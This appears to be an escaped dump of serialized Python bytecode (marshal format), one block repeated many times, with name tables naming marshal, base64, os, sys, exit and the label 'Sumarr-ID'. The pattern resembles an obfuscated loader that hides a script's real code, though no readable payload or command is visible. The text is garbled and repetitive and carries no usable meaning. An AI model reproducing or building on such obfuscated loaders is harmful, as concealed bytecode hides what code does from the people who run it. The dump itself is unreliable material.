00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\